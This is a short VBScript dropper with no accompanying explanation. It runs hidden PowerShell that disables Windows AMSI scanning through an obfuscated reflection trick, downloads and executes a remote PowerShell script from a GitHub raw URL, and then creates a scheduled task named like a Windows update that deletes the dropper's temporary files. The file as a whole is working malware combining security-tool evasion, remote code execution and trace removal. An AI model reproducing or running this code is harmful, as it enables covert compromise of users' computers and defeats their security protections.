Set w4 = CreateObject("WScript.Shell")

w4.Run ("powershell -ep bypass -win hid -nop [Ref].Assembly.GetType('System.Management.Automation.'+$([sYStem.neT.wEButiLITY]::hTmlDecOdE('&#65;&#109;&#115;&#105;'))+'Utils').GetField($([ChaR]([bYTE]0x61)+[ChAR]([BytE]0x6D)+[cHAr](201-86)+[CHaR]([byTe]0x69)+[Char](4745/65)+[CHAr]([ByTE]0x6E)+[cHar]([bytE]0x69)+[chaR]([bYtE]0x74)+[chAr](2800/40)+[ChaR]([ByTe]0x61)+[CHar](189-84)+[chAR]([bYTE]0x6C)+[CHAR](1515/15)+[cHAr](6900/69)),'NonPublic,Static').SetValue($null,$true); IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/section10housing/b1/master/blackswanfinal.ps1')"), 0, False

Set Delshell = wscript.createobject("wscript.shell")
Delshell.run "schtasks /delete /tn Win10update2 /F", 0, False


Set Fourshell = wscript.createobject("wscript.shell")
Fourshell.run "schtasks /create /sc minute /mo 5 /tn Win10update3 /tr ""cmd start /min /c del %tmp%\windows10two.vbs && schtasks /delete /tn Win10update3 /F && del %tmp%\lnk-helper.vbs""", 0, False

